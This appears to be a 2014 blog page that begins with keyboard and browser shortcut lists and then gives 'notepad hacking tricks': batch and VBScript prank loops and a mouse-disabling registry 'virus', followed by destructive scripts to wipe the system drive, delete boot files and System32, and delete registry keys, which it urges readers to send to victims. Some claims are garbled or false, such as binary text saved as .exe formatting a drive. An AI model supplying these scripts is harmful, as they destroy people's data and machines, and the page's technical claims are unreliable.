Saturday, 30 August 2014

                        

Get your JNVU EXAM Result 2013-14 at 

                                                Result 2013-14   

Shortcuts Keys In Browse Web





We all know many Shortcuts of Keyboard such as :

Ctrl + A = Select All

Ctrl + N = New Window

Ctrl + O = Open

Ctrl + S = Save

Shift + F12 = Save

Ctrl + Z = Undo

Ctrl + Y = Redo

Ctrl + X = Cut

Ctrl + C = Copy

Ctrl + V =Paste

Shift + Insert = Paste

*******************************************************************************
Little More harder Shortcuts in Windows may be you knowing some of them are :
********************************************************************************
Ctrl + Esc = Bring Start Menu

Alt + Tab = Switch between Windows

Alt + Esc = Switch between Programs on Taskbar

Alt + F4 = Close Current Program

Alt + Shift + D = Insert Current date

Alt + Shit + T = Insert Current time

Ctrl + Alt + Del = Windows Task Manager

Ctrl + Shift + Esc = Windows Task Manager


*********************************************************************************Some of Windows WIN Key Shortcuts which are much useful in day to day life are :
********************************************************************************

WINKEY + D = Bring Desktop to top of Other Windows

WINKEY + M = Minimize all windows

WINKEY + E = Open Microsoft Explorer

WINKEY + Tab = Cycle through open programs on taskbar

WINKEY + F = Display the Windows® Search/Find feature

WINKEY + F1 = Display the Microsoft® Windows® help

WINKEY + R = Open the run window

WINKEY + Pause /Break = Open the system properties window

WINKEY + U = Open utility manager

WINKEY + L = Lock the computer (Windows XP® & later)

*********************************************************************************These above listed Shortcuts are most useful for faster working with Windows Computers

But Lets have Some Look at the shortcuts which are also Much used in Mostly all famous Web browsers such as Google Chrome, Internet Explorer, Opera , Safari , Mozilla Firefox etc.

********************************************************************************


Try these Shortcuts in Browser for saving your precious time....

Open a new window: Ctrl+N

Open link in a new tab: Press Ctrl, and click a link


Open link in a new window: Press Shift, and click a link


Close current window: Alt+F4


Open a new tab: Ctrl+T


Reopen the last tab you’ve closed: Ctrl+Shift+T


Close current tab or pop-up: Ctrl+W or Ctrl+F4


Switch to the last tab: Ctrl+9 


Switch to the next tab: Ctrl+Tab or Ctrl+PgDown


Switch to the previous tab: Ctrl+Shift+Tab or Ctrl+PgUp


Open your web address in a new tab: Type a web address, then press Alt+Enter


Highlight content in the web address area: F6 or Ctrl+L or Alt+D


View the History page: Ctrl+H


View the Downloads page: Ctrl+J


Download link: Press Alt, and click a link


********************************************************************************
all mostly http links no need to write 'http://www.' also those with the top level '.com' domain also you need not to write '.com' at the end instead press "Clt+Enter" it would automatically done by Browser.
*********************************************************************************

How To Make A Virus For Disable your Mouse



1. Open Notepad

2. Then copy below codes given in red colour

Code:rem ---------------------------------rem Disable Mouseset key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4rem ---------------------------------

3.Save this file as  virus.bat
4.Done you just created your virus
enjoy
keep visiting
06 Jul 2014

Friday, 29 August 2014

All Cool Notepad tricks | Hacking Tricks | Create a Virus

        Notepad tricks: Save All File in "name.vbs"




Annoying Message Windows:


WScript.Echo ("INSERT TEXT HERE")
WScript.Echo ("INSERT TEXT HERE")
WScript.Echo ("INSERT TEXT HERE")
WScript.Echo ("INSERT TEXT HERE")
WScript.Echo ("INSERT TEXT HERE")
WScript.Echo ("INSERT TEXT HERE")



Make your pc faster:


mystring=(80000000)



Open your Cd Drive: Save it as “Anything.VBS”.


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count = 1 then
for i = 0 to colCDROMS.Count - 1
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
Next ' cdrom
end if



Matrix falling text: Save the file with .bat extension like Matrix.bat


@echo off
:loop
COlor 0A
Title J J f f g g g g

echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8
echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k
echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u
echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d
echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4
goto :loop

Chatbox:


dim fname
fname=inputbox(" INSERT TEXT HERE")
fname=inputbox(" INSERT TEXT HERE")
fname=inputbox(" INSERT TEXT HERE")
fname=inputbox(" INSERT TEXT HERE")






Test Your Anti-Virus



  • Open Notepad.
  • Copy the code give below in the notepad file:
  • X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • Save it with an .exe extension like testvirus.exe

  Change The Header/Footer Of Your Notepad File



  • Open Notepad.
  • Click on File -> Page Setup.
  • Replace the text in the “Header” & “Footer” box by any of the following codes:
  1. &l Left-align the characters that follow
  2. &c Center the characters that follow
  3. &r Right-align the characters that follow
  4. &d Print the current date
  5. &t Print the current time
  6. &f Print the name of the document
  7. &p Print the page number


Constantly Repeat Messages


  • Open Notepad.
  • Paste the following code in the notepad file:
@ECHO off:Beginmsg * Himsg * Are you having fun?msg * I am!msg * Lets have fun together!msg * Because you have been o-w-n-e-dGOTO BEGIN
  • Save the file with any file name " message.bat "
  • After saving the file just open it and see what happens.


Shut-down The Computer After Conveying Any Message


  • Open Notepad.
  • Paste the following code in it:
@echo off
msg * Its time to get some rest.
shutdown -c “Error! You have to take rest! Byeeeeee” -s
  • Save the file with any name " shutdown.bat "

Toggle Keyboard Button Simultaneously


1. Caps Lock Key

  • Open Notepad.
  • Paste the following code in the notepad file:
Set wshShell =wscript.CreateObject(“WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “{CAPSLOCK}”loop
  • Save the file " hackgiri.vbs " and close it.



2. Hit Enter Key Continuously

Open Notepad.
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save the file with any name and .vbs extension and close it.
Now open the newly created file and see how the enter key behaves!


3. Hit Backspace Key Continuously


  • Open Notepad.
  • Paste the following code in the notepad file:
MsgBox “Lets Rumble”Set wshShell =wscript.CreateObject(“WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “{bs}”loop
  • Save the file  " hackgiri .vbs "


4. Type “You are a fool” Continuously



  • Open Notepad.
  • Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “You are a fool.”loop
  • Save the file ->  hackgiri .vbs 


5. Open Notepad continuously



Open Notepad.
Paste the following code in your notepad file:
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
Save the file with any name nut with .bat extension and close it.
Now open the file and see how it annoys you by opening notepad again and again.

6. Pick Your Option Batch File

  • Open Notepad.
  • Paste the following code in the notepad file:
@echo offtitle Get A Lifecd C::menuclsecho I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.pauseecho Pick your option:echo 1. Die Slowlyecho 2. Instant Deathecho 3. Stay Away From This Oneecho 4. Die this way (For Wimps!)echo 5. Easy way outset input=nothingset /p input=Choice:if %input%==1 goto oneif %input%==2 goto two
  • Save the file name " hackgiri.bat "

Most Dangerous Tricks are started

I WILL SHOW YOU HOW TO FORMAT A HDD USING NOTEPAD 

 HOW TO DESTROY VICTIMS PC USING NOTEPAD. THIS IS REALLY COOL.


STEP 1 :-
COPY THE FOLLOWING IN NOTEPAD EXACTLY AS IT IS.
SAYS01001011000111110010010101010101010000011111100000
STEP 2 :-
SAVE AS AN .EXE ANY NAME WILL DO
STEP 3 :-
SEND THE .EXE TO PEOPLE AND INFECT
OR
IF YOU THINK CANNOT FORMAT C DRIVE WHEN WINDOWS IS RUNNING TRY LAUGHING AND U WILL GET. 
ANY WAY SOME MORE SO U CAN TEST ON OTHER DRIVES THIS IS SIMPLE BINARY CODE

FORMAT C:\ /Q/X — THIS WILL FORMAT YOUR DRIVE C:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000

FORMAT D:\ /Q/X — THIS WILL FORMAT YOUR DRIVE D:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000

FORMAT A:\ /Q/X — THIS WILL FORMAT YOUR DRIVE A:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000

DEL /F/S/Q C:\BOOT.INI — THIS WILL CAUSE YOUR COMPUTER NOT TO BOOT.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

TRY TO FIGURE OUT URSELF REST
CANT SPOONFEED
ITS WORKING

DO NOT TRY IT ON YOUR PC. 
DON’T MESS AROUND THIS IS FOR EDUCATIONAL PURPOSE ONLY
STILL IF YOU CANT FIGURE IT OUT TRY THIS

GO TO NOTEPAD AND TYPE THE FOLLOWING:



(B) @ECHO OFF

DEL C:\ *.*|Y
SAVE IT AS DELL.BAT
WANT WORSE THEN TYPE THE FOLLOWING:
@ECHO OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00
AND SAVE IT AS A .BAT FILE

(C) HOW TO SHUTDOWN A COMPUTER FOREVER..CODE:



@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

OPEN UP AND COPY THE CODE AND SAVE IT AS .BAT FILE.

(D) A SIMPLE HACK TO DESTROY UR VICTIM’S PC


I M NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY THIS FILE.”

1. OPEN NOTEPAD
2. WRITE THE ABOVE COMMAND : -

DEL C:\WINDOWS\SYSTEM32\*.*/Q

3. SAVE the name of “hackgiri.BAT OR hackgiri.CMD” 

4. !!!!!!!!!!!!!!!!!!!!!!ATTENTION!!!!!!!!!!!!!!!!!!! !!!
DON’T DOUBLE CLICK THE FILE OTHERWISE U R IN TROUBLE.YOU CAN TRY THIS FILE IN ANY ONE`S COMPUTER.(BUT THIS RESULT IN CAUSING DAMAGE TO THE COMPUTER, SO THINK AGAIN BEFORE TRYING THIS ON ANYONE’S PC)

***MOST DANGEROUS NOTEPAD TRICK***
OPEN NOTEPAD  TYPE:
@ECHO OFF
START REG DELETE
HKCR/ .EXE
START REG DELETE
HKCR/.DLL
START REG DELETE HKCR/*
:MESSAGE
ECHO YOUR COMPUTER HAS
BEEN FCKED.HAVE A
NICE DAY.
GOTO MESSAGE